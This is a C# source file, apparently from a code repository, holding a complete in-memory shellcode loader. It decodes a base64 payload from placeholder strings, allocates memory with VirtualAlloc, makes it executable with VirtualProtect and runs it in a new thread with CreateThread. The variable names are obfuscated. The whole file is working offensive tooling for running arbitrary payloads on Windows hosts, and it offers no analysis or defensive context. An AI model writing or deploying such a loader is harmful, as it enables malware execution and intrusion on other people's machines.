85 lines
2.8 KiB
C#
Executable File
85 lines
2.8 KiB
C#
Executable File
using System;
|
|
using System.Reflection;
|
|
using System.Diagnostics;
|
|
using System.Configuration.Install;
|
|
using System.Runtime.InteropServices;
|
|
using System.Threading;
|
|
|
|
class Program
|
|
{
|
|
[Flags()]
|
|
public enum AllocationType : uint
|
|
{
|
|
COMMIT = 0x1000,
|
|
RESERVE = 0x2000,
|
|
RESET = 0x80000,
|
|
LARGE_PAGES = 0x20000000,
|
|
PHYSICAL = 0x400000,
|
|
TOP_DOWN = 0x100000,
|
|
WRITE_WATCH = 0x200000
|
|
}
|
|
|
|
public enum Protection
|
|
{
|
|
PAGE_NOACCESS = 0x01,
|
|
PAGE_READONLY = 0x02,
|
|
PAGE_READWRITE = 0x04,
|
|
PAGE_WRITECOPY = 0x08,
|
|
PAGE_EXECUTE = 0x10,
|
|
PAGE_EXECUTE_READ = 0x20,
|
|
PAGE_EXECUTE_READWRITE = 0x40,
|
|
PAGE_EXECUTE_WRITECOPY = 0x80,
|
|
PAGE_GUARD = 0x100,
|
|
PAGE_NOCACHE = 0x200,
|
|
PAGE_WRITECOMBINE = 0x400
|
|
}
|
|
|
|
[DllImport("kernel32.dll", SetLastError=true)]
|
|
static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);
|
|
|
|
[DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
|
|
static extern IntPtr CreateThread(
|
|
IntPtr lpThreadAttributes,
|
|
uint dwStackSize,
|
|
IntPtr lpStartAddress,
|
|
IntPtr lpParameter,
|
|
uint dwCreationFlags,
|
|
out uint lpThreadId);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);
|
|
|
|
static void Main(string[] args)
|
|
{
|
|
byte[] shell = null;
|
|
|
|
string safdsv64 = "#REPLACEME64#";
|
|
string safdsv32 = "#REPLACEME32#";
|
|
|
|
if (IntPtr.Size == 4)
|
|
{
|
|
// 32-bit sc
|
|
shell = Convert.FromBase64String(safdsv32);
|
|
}
|
|
else if (IntPtr.Size == 8)
|
|
{
|
|
// 64-bit sc
|
|
shell = Convert.FromBase64String(safdsv64);
|
|
}
|
|
|
|
IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
|
|
|
|
if(mem != IntPtr.Zero)
|
|
{
|
|
uint oldProt = 0;
|
|
uint threadId = 0;
|
|
Marshal.Copy(shell, 0, mem, shell.Length);
|
|
VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt);
|
|
CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
|
|
WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);
|
|
wh.WaitOne();
|
|
}
|
|
}
|
|
|
|
}
|